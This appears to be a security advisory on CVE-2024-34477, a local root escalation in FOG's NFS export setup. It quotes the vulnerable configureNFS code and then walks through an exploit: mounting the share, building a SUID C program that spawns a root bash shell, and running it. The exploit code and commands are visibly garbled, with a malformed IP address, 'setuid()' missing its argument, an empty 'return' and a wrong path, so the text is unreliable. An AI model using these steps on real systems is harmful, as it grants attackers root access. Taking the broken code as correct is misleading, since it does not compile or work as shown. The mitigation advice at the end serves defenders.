CVE-2024-34477: Privilege Escalation Vulnerability in FOG's ConfigureNFS Function

A new vulnerability has been discovered in FOG's configureNFS function, which is located in the lib/common/functions.sh file. FOG is an open-source imaging solution for Windows, Mac, and Linux that is used to deploy pre-built images onto new computers. The vulnerability, tracked as CVE-2024-34477, allows local users to gain elevated privileges by mounting a crafted Network File System (NFS) share. This is because the NFS configuration uses both the "no_root_squash" and "insecure" options.

Details of the Vulnerability

The vulnerability exists in the configureNFS function in the lib/common/functions.sh file in FOG through version 1.5.10. By mounting a maliciously crafted NFS share, a bad actor can add an executable file with root privileges. They can then add the Set User ID (SUID) bit to this file, which allows any user executing the file to gain root privileges.

A code snippet from the lib/common/functions.sh file in FOG shows the insecure configuration

configureNFS() {
    ...
    echo "################################################################################
    #
    # * * * * * * IMPORTANT EXPORT INFORMATION BELOW! PLEASE REVIEW! * * * * * *
    #
    # If there are orphaned records in your database, it's important to run on
    # your FOG Server: mysql -u root -p -D fog -e 'DELETE FROM nfsGroupMembers WHERE
    #               nfsMemberID NOT IN (SELECT nmID FROM nfsMembers);'
    #
    ################################################################################
    displayIPAddressV4=$(ip -4 addr list dev $dev | awk -F'[ /]+' '/inet /{print $3}')
    printf "\n\n# FOG exports. Don't edit this file. This is auto-created and destroyed daily.
\"/home\" .../...(ro,sync,no_wdelay,insecure_locks,no_root_squash,insecure)
...

Notice the options "no_root_squash" and "insecure" in the configuration. The no_root_squash option allows remote root users to have root-level access to the exported NFS share. The insecure option allows connections from ports greater than 1024, enabling unprivileged users the ability to connect. This combination of options creates a security vulnerability that can be exploited by malicious users.

Exploiting CVE-2024-34477

In order to exploit this vulnerability, an attacker needs to mount the insecure NFS share and then add an executable file as the root user. Afterwards, they must add the SUID bit to this file, which allows any user executing the file to gain root privileges. Here is an example of how an attacker can exploit this vulnerability:

Mount the insecure NFS share

mount -t nfs -o vers=3 192..2.12://home /mnt/nfs_share

Create a simple C program that spawns a shell, compile it, and place the binary in the NFS share

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
    setuid();
    system("/bin/bash");
    return ;
}

Change the ownership of the binary to root and set the SUID bit

chown root:root /mnt/nfs_share/shell_binary
chmod +s /mnt/nfs_share/shell_binary

Run the binary from any user account

./mnt/nfs_share/shell_binary

After executing the binary, the user will now be running a shell with root privileges.

This vulnerability was first reported in FOG's GitHub repository

- Issue #254
- Pull Request #255

To mitigate this issue, administrators should adjust their NFS configuration to remove the "no_root_squash" and "insecure" options from the exported share. Additionally, it is recommended to keep FOG up-to-date to ensure the latest patches and security fixes are available, as well as implementing network-level protections to limit unauthorized access to the NFS server.

Timeline

Published on: 05/27/2024 14:15:09 UTC
Last modified on: 08/26/2024 15:35:10 UTC